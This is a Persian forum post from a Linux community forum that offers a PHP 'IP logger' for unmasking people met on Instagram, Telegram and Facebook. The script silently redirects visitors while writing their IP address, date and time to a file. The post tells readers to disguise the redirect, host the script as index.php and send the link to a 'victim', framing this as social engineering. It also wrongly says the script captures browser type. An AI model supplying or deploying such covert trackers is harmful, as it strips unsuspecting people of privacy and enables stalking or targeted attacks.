اطلاعیه

بستن
هنوز اطلاعیه ای در دست نیست.

پیدا کردن ip افراد در Instagram، Telegram و Facebook از طریق اسکریپت

بستن
X
 
  • فیلتر کردن
  • زمان
  • نمایش
Clear All
پست های جدید

    پیدا کردن ip افراد در Instagram، Telegram و Facebook از طریق اسکریپت

    اکثر کاربران همیشه به دنبال این بودند که چطوری میشه در شبکه های اجتماعی مثل تلگرام یا اینستاگرام یا فیسبوک و … بتونیم IP افرادی که باهاشون در ارتباط هستیم رو بدست بیاریم ؟!

    در این پست یکی از روش های رایج و عالی اینکار رو مطرح میکنیم.که البته در هکینگ هم ازش استفاده میشه و بر پایه مهندسی اجتماعی هست . میتونم بگم یکی از بهترین راه کار برای پیدا کردن IP تارگت ها هست.

    ما اینکار را با یک کدنویسی و اسکریپت php انجام میدیم.
    کد:
    
    <?php header('LOCATION: http://linux-zone.org');  $ip = $_SERVER['REMOTE_ADDR']; $filename = "IPAddress".date("jMY"); $filename =$filename.".txt"; $file=fopen($filename,"a+"); fwrite($file,"**********************"); fwrite($file,"\r\nDate : "); fwrite($file,date("j D M Y")); fwrite($file,"\r\nTime : "); fwrite($file,date("g:i a e"));  fwrite($file,"\r\n**********************"); fwrite($file,"\r\nIP ADDRESS : "); fwrite($file,$ip); fwrite($file,"\r\n**********************"); fwrite($file,"\r\n\r\n"); fclose($file); ?>
    حالا اون فایل php را میتوانید تغییرات لازم رو توش بدین که مثلا به کدام آدرس ریدایرکت بشه و کاربر شک نکنه و … بعد از انجام تغییرات میتوانید در سرور رایگان یا پولی خودتان آپلود کنید و لینک را به قربانی بدین. با یکبار اجرا توسط قربانی ، اطلاعاتی نظیر آی پی ، نوع مرورگر، زمان و تاریخ در سرور شما سیو خواهد شد.


    نکته : در صورت امکان در ایندکس سیو کنید ینی با نام index.php در سرور تا به عنوان ایندکس سایت بتونین لینک رو به قربانی بدین مثلا به اینصورت :
    کد:
    [B]http://site.com[/B]
    همچنین اسکریپت رو بصورت فایل متنی پیوست کردم.
    فایل های پیوست شده
    آخرین ویرایش توسط 4TT4CK3R; در تاریخ/ساعت 03-19-2016, 01:40 PM.

    #2
    حرف نداری....عالللییییی

    کامنت

    درباره انجمن منطقه لینوکسی ها

    انجمن منطقه لینوکسی ها با هدف ارتقاء سطح علمی کاربران در سطح جهانی و همچنین کمک به بالا بردن سطح علمی عمومی در زمینه های تخصصی فوق پایه گذاری شده است. انجمن منطقه لینوکسی ها از طریق کارشناسان و متخصصان پاسخگوی سوالات گوناگون کاربران مبتدی یا پیشرفته میباشد تا حد امکان تلاش شده که محیطی متنوع و کاربر پسند و به دور از هرگونه حاشیه جهت فعالیت کاربران در این انجمن ایجاد شود. لذا ما به صورت مستمر برای پیشرفت کمی و کیفی محتوی و اطلاعات انجمنمان میکوشیم که این برای ما ارزشمند و حائز اهمیت است. کلیه حقوق،اطلاعات و مقالات در این انجمن متعلق به سایت منطقه لینوکسی ها میباشد، و هرگونه نسخه برداری بدون ذکر منبع مورد پیگرد قانونی خواهد شد.

    شبکه های اجتماعی
    در حال انجام ...
    X